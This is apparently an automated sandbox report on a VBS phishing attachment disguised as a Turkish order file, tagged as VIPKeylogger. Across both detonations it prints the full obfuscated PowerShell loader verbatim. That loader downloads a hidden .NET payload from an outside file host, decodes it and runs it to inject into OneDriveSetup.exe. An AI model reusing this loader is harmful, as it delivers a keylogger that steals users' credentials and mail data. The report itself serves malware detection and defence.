Analysis Overview
SHA256
c35fb5adc491eb8c62504f7d88e8809a7d273b29851a6a66b6155936d07acea3
Threat Level: Known bad
The file Yeni sipariş _TR-59647-WJO-001.vbs was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Vipkeylogger family
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Script User-Agent
outlook_win_path
outlook_office_path
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-12 18:18
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-12 18:18
Reported
2024-11-12 18:20
Platform
win7-20241010-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Yeni sipariş _TR-59647-WJO-001.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lhkienstecrzljq.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdGdktpbWFnZVVybCA9IHdGbGh0dHBzOi8vMTAxNy5maWxlbWFpbC4nKydjb20vYXBpLycrJ2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NCcrJzUxNzZhMDkwNGYgd0ZsO0Z2S3dlYkNsaWVudCA9JysnIE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JysnRnZLaW1hZ2VCeXRlcyA9IEZ2S3dlYkNsaWVuJysndC5Eb3dubG9hJysnZERhdGEoRnZLaW1hZ2VVcmwpO0Z2S2ltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEZ2S2ltYWdlQnl0ZScrJ3MpO0Z2S3N0YXJ0RmxhZyA9IHdGbDw8QkFTRTY0X1NUQVJUPj53Rmw7RnZLZW5kRmxhZyA9IHdGbDw8QkFTRTY0X0VORD4+d0ZsO0Z2S3N0YXJ0SW5kZXggPSBGdktpbWFnZVRleCcrJ3QuSW5kZXhPZihGdktzdGFydEZsYWcpO0Z2S2VuZEluZGV4ID0gRnZLaW1hZ2VUZXh0LkluZGV4T2YoRnZLZW5kRmxhZyk7RnZLc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIEZ2S2VuZEluZGV4IC1ndCBGdktzdGFydEluZGV4O0Z2S3N0YXJ0SW5kZXggKz0gRnZLc3RhcnRGbGFnLkxlbmd0aDtGdicrJ0tiYXNlNjRMZW5ndGggPSBGdktlbmRJbmRleCAtIEZ2S3N0YXJ0SW5kZXg7RnZLYmFzZTY0Q29tbWFuZCA9IEZ2S2ltYWdlVGV4dC5TdWJzdHJpbmcoRnZLc3RhcnRJbmQnKydleCwgRnZLYmFzZTY0TGVuZ3RoKTtGdktiYScrJ3NlNjRSZScrJ3ZlcnNlZCA9IC1qb2luIChGdktiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgOFh2IEZvckVhY2gtT2JqZWN0IHsgRnZLXyB9KVsnKyctMS4uLShGdktiYXNlNjRDb21tYW5kLkxlbmd0aCldO0Z2S2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkZyb21CYXMnKydlNjRTdHJpbmcoRnZLYicrJ2FzZTY0UmV2ZXJzZWQpO0Z2S2xvYWRlZEFzc2VtYmx5ID0nKycgW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChGJysndktjb21tYW5kQnl0ZXMpO0Z2S3ZhaU1ldGhvZCcrJyA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2Qod0ZsVkFJd0ZsKTtGJysndkt2YWlNZXRob2QuSW52b2tlKEZ2S251bGwsIEAodycrJ0ZsdHh0LmRzdGVwL3BvcC91ZS5wcmcnKyd4YW15Z3JlbmUuZ2lnLy86cHR0aHdGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsMXdGbCwgdycrJ0ZsT25lRHJpdmVTZXR1cHdGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCx3RmxkZXNhdGl2YWRvd0ZsLHdGbGRlc2F0aXZhZG93Rmwsd0ZsZGVzYXRpdmFkb3dGbCx3Rmwxd0ZsLHdGbGRlc2F0aXZhZG93RmwpKScrJzsnKS5SZXBsQWNFKCd3RmwnLFtzVFJJbkddW0NoQXJdMzkpLlJlcGxBY0UoKFtDaEFyXTcwK1tDaEFyXTExOCtbQ2hBcl03NSksJyQnKS5SZXBsQWNFKChbQ2hBcl01NitbQ2hBcl04OCtbQ2hBcl0xMTgpLCd8JykgfCYgKCAkVkVSYm9zZXByZUZlcmVuQ2UuVG9zVFJJbkcoKVsxLDNdKydYJy1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('FvKimageUrl = wFlhttps://1017.filemail.'+'com/api/'+'file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c173094'+'5176a0904f wFl;FvKwebClient ='+' New-Object System.Net.WebClient;'+'FvKimageBytes = FvKwebClien'+'t.Downloa'+'dData(FvKimageUrl);FvKimageText = [System.Text.Encoding]::UTF8.GetString(FvKimageByte'+'s);FvKstartFlag = wFl<<BASE64_START>>wFl;FvKendFlag = wFl<<BASE64_END>>wFl;FvKstartIndex = FvKimageTex'+'t.IndexOf(FvKstartFlag);FvKendIndex = FvKimageText.IndexOf(FvKendFlag);FvKstartIndex -ge '+'0 -and FvKendIndex -gt FvKstartIndex;FvKstartIndex += FvKstartFlag.Length;Fv'+'Kbase64Length = FvKendIndex - FvKstartIndex;FvKbase64Command = FvKimageText.Substring(FvKstartInd'+'ex, FvKbase64Length);FvKba'+'se64Re'+'versed = -join (FvKbase64Command.ToCharArray() 8Xv ForEach-Object { FvK_ })['+'-1..-(FvKbase64Command.Length)];FvKcommandBytes = [System.Convert'+']::FromBas'+'e64String(FvKb'+'ase64Reversed);FvKloadedAssembly ='+' [System.Reflectio'+'n.Assembly]::Load(F'+'vKcommandBytes);FvKvaiMethod'+' = [dnlib.IO.Home].GetMethod(wFlVAIwFl);F'+'vKvaiMethod.Invoke(FvKnull, @(w'+'Fltxt.dstep/pop/ue.prg'+'xamygrene.gig//:ptthwFl, wFldesativadowFl, wFldesativadowFl, wFldesativadowFl, wFldesativadowFl, wFl1wFl, w'+'FlOneDriveSetupwFl, wFldesativadowFl, wFldesativadowFl,wFldesativadowFl,wFldesativadowFl,wFldesativadowFl,wFl1wFl,wFldesativadowFl))'+';').ReplAcE('wFl',[sTRInG][ChAr]39).ReplAcE(([ChAr]70+[ChAr]118+[ChAr]75),'$').ReplAcE(([ChAr]56+[ChAr]88+[ChAr]118),'|') |& ( $VERbosepreFerenCe.TosTRInG()[1,3]+'X'-JoIN'')"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:80 | paste.ee | tcp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\lhkienstecrzljq.vbs
| MD5 | a82f4032d41676a0b73ed0812494840e |
| SHA1 | 72dc7035344b30d2430fb851f383070dc3d1e364 |
| SHA256 | b03c7f247ea3d720f27e34e0975cb0b3a04100a2222bc86bce6c210eb8d352d0 |
| SHA512 | 42c3a17ec824725cd157ba4af541b2c3d36c371297e836906de4f9e310a8d9f8bfeb9a835e1d0eb39807d11422c20fa1d54875065c2188874678776c0124ba01 |
memory/368-8-0x000000001B1E0000-0x000000001B4C2000-memory.dmp
memory/368-9-0x0000000001F40000-0x0000000001F48000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b0a7dfb809d233fc4c0ae088f3462187 |
| SHA1 | 0af9b9efa173e0699d63356552ee97079f5d8b42 |
| SHA256 | 7ab8c57593e804e3a250daf2bd8a2df8c79d022b6984da7660dff4f75ec5210f |
| SHA512 | 7057cfb9b9ee2a8605e9c506f74f42dddd2b46cd521a026d31511b6ed95c5052e534f2201482c7fba973beb9203793db1b3c6ea048b98fd0d044738fcdf7acaa |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-12 18:18
Reported
2024-11-12 18:20
Platform
win10v2004-20241007-en
Max time kernel
117s
Max time network
150s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4928 set thread context of 2808 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\OneDriveSetup.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\OneDriveSetup.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Yeni sipariş _TR-59647-WJO-001.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lhkienstecrzljq.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdGdktpbWFnZVVybCA9IHdGbGh0dHBzOi8vMTAxNy5maWxlbWFpbC4nKydjb20vYXBpLycrJ2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NCcrJzUxNzZhMDkwNGYgd0ZsO0Z2S3dlYkNsaWVudCA9JysnIE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JysnRnZLaW1hZ2VCeXRlcyA9IEZ2S3dlYkNsaWVuJysndC5Eb3dubG9hJysnZERhdGEoRnZLaW1hZ2VVcmwpO0Z2S2ltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEZ2S2ltYWdlQnl0ZScrJ3MpO0Z2S3N0YXJ0RmxhZyA9IHdGbDw8QkFTRTY0X1NUQVJUPj53Rmw7RnZLZW5kRmxhZyA9IHdGbDw8QkFTRTY0X0VORD4+d0ZsO0Z2S3N0YXJ0SW5kZXggPSBGdktpbWFnZVRleCcrJ3QuSW5kZXhPZihGdktzdGFydEZsYWcpO0Z2S2VuZEluZGV4ID0gRnZLaW1hZ2VUZXh0LkluZGV4T2YoRnZLZW5kRmxhZyk7RnZLc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIEZ2S2VuZEluZGV4IC1ndCBGdktzdGFydEluZGV4O0Z2S3N0YXJ0SW5kZXggKz0gRnZLc3RhcnRGbGFnLkxlbmd0aDtGdicrJ0tiYXNlNjRMZW5ndGggPSBGdktlbmRJbmRleCAtIEZ2S3N0YXJ0SW5kZXg7RnZLYmFzZTY0Q29tbWFuZCA9IEZ2S2ltYWdlVGV4dC5TdWJzdHJpbmcoRnZLc3RhcnRJbmQnKydleCwgRnZLYmFzZTY0TGVuZ3RoKTtGdktiYScrJ3NlNjRSZScrJ3ZlcnNlZCA9IC1qb2luIChGdktiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgOFh2IEZvckVhY2gtT2JqZWN0IHsgRnZLXyB9KVsnKyctMS4uLShGdktiYXNlNjRDb21tYW5kLkxlbmd0aCldO0Z2S2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkZyb21CYXMnKydlNjRTdHJpbmcoRnZLYicrJ2FzZTY0UmV2ZXJzZWQpO0Z2S2xvYWRlZEFzc2VtYmx5ID0nKycgW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChGJysndktjb21tYW5kQnl0ZXMpO0Z2S3ZhaU1ldGhvZCcrJyA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2Qod0ZsVkFJd0ZsKTtGJysndkt2YWlNZXRob2QuSW52b2tlKEZ2S251bGwsIEAodycrJ0ZsdHh0LmRzdGVwL3BvcC91ZS5wcmcnKyd4YW15Z3JlbmUuZ2lnLy86cHR0aHdGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsMXdGbCwgdycrJ0ZsT25lRHJpdmVTZXR1cHdGbCwgd0ZsZGVzYXRpdmFkb3dGbCwgd0ZsZGVzYXRpdmFkb3dGbCx3RmxkZXNhdGl2YWRvd0ZsLHdGbGRlc2F0aXZhZG93Rmwsd0ZsZGVzYXRpdmFkb3dGbCx3Rmwxd0ZsLHdGbGRlc2F0aXZhZG93RmwpKScrJzsnKS5SZXBsQWNFKCd3RmwnLFtzVFJJbkddW0NoQXJdMzkpLlJlcGxBY0UoKFtDaEFyXTcwK1tDaEFyXTExOCtbQ2hBcl03NSksJyQnKS5SZXBsQWNFKChbQ2hBcl01NitbQ2hBcl04OCtbQ2hBcl0xMTgpLCd8JykgfCYgKCAkVkVSYm9zZXByZUZlcmVuQ2UuVG9zVFJJbkcoKVsxLDNdKydYJy1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('FvKimageUrl = wFlhttps://1017.filemail.'+'com/api/'+'file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c173094'+'5176a0904f wFl;FvKwebClient ='+' New-Object System.Net.WebClient;'+'FvKimageBytes = FvKwebClien'+'t.Downloa'+'dData(FvKimageUrl);FvKimageText = [System.Text.Encoding]::UTF8.GetString(FvKimageByte'+'s);FvKstartFlag = wFl<<BASE64_START>>wFl;FvKendFlag = wFl<<BASE64_END>>wFl;FvKstartIndex = FvKimageTex'+'t.IndexOf(FvKstartFlag);FvKendIndex = FvKimageText.IndexOf(FvKendFlag);FvKstartIndex -ge '+'0 -and FvKendIndex -gt FvKstartIndex;FvKstartIndex += FvKstartFlag.Length;Fv'+'Kbase64Length = FvKendIndex - FvKstartIndex;FvKbase64Command = FvKimageText.Substring(FvKstartInd'+'ex, FvKbase64Length);FvKba'+'se64Re'+'versed = -join (FvKbase64Command.ToCharArray() 8Xv ForEach-Object { FvK_ })['+'-1..-(FvKbase64Command.Length)];FvKcommandBytes = [System.Convert'+']::FromBas'+'e64String(FvKb'+'ase64Reversed);FvKloadedAssembly ='+' [System.Reflectio'+'n.Assembly]::Load(F'+'vKcommandBytes);FvKvaiMethod'+' = [dnlib.IO.Home].GetMethod(wFlVAIwFl);F'+'vKvaiMethod.Invoke(FvKnull, @(w'+'Fltxt.dstep/pop/ue.prg'+'xamygrene.gig//:ptthwFl, wFldesativadowFl, wFldesativadowFl, wFldesativadowFl, wFldesativadowFl, wFl1wFl, w'+'FlOneDriveSetupwFl, wFldesativadowFl, wFldesativadowFl,wFldesativadowFl,wFldesativadowFl,wFldesativadowFl,wFl1wFl,wFldesativadowFl))'+';').ReplAcE('wFl',[sTRInG][ChAr]39).ReplAcE(([ChAr]70+[ChAr]118+[ChAr]75),'$').ReplAcE(([ChAr]56+[ChAr]88+[ChAr]118),'|') |& ( $VERbosepreFerenCe.TosTRInG()[1,3]+'X'-JoIN'')"
C:\Windows\SysWOW64\OneDriveSetup.exe
"C:\Windows\SysWOW64\OneDriveSetup.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 104.21.84.67:80 | paste.ee | tcp |
| US | 104.21.84.67:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.84.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 8.8.8.8:53 | 78.209.215.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gig.energymaxgrp.eu | udp |
| US | 107.174.244.110:80 | gig.energymaxgrp.eu | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 193.122.130.0:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | 110.244.174.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 0.130.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pdf.maxengrygrp.eu | udp |
| US | 107.174.244.110:80 | pdf.maxengrygrp.eu | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\lhkienstecrzljq.vbs
| MD5 | a82f4032d41676a0b73ed0812494840e |
| SHA1 | 72dc7035344b30d2430fb851f383070dc3d1e364 |
| SHA256 | b03c7f247ea3d720f27e34e0975cb0b3a04100a2222bc86bce6c210eb8d352d0 |
| SHA512 | 42c3a17ec824725cd157ba4af541b2c3d36c371297e836906de4f9e310a8d9f8bfeb9a835e1d0eb39807d11422c20fa1d54875065c2188874678776c0124ba01 |
memory/2828-4-0x000001E2EC3E0000-0x000001E2EC402000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5vupbvid.twr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4928-23-0x00000202AC1E0000-0x00000202AC338000-memory.dmp
memory/2808-24-0x0000000000400000-0x0000000000437000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
memory/2808-30-0x0000000000400000-0x0000000000437000-memory.dmp
memory/2808-31-0x0000000007360000-0x00000000073B0000-memory.dmp
memory/2808-32-0x0000000007AD0000-0x0000000008074000-memory.dmp
memory/2808-33-0x00000000073F0000-0x000000000743E000-memory.dmp
memory/2808-34-0x0000000007520000-0x00000000075BC000-memory.dmp
memory/2808-35-0x0000000008960000-0x0000000008B22000-memory.dmp
memory/2808-36-0x0000000008800000-0x0000000008850000-memory.dmp
memory/2808-37-0x0000000009060000-0x000000000958C000-memory.dmp
memory/2808-38-0x0000000009690000-0x0000000009722000-memory.dmp
memory/2808-39-0x0000000008CC0000-0x0000000008CCA000-memory.dmp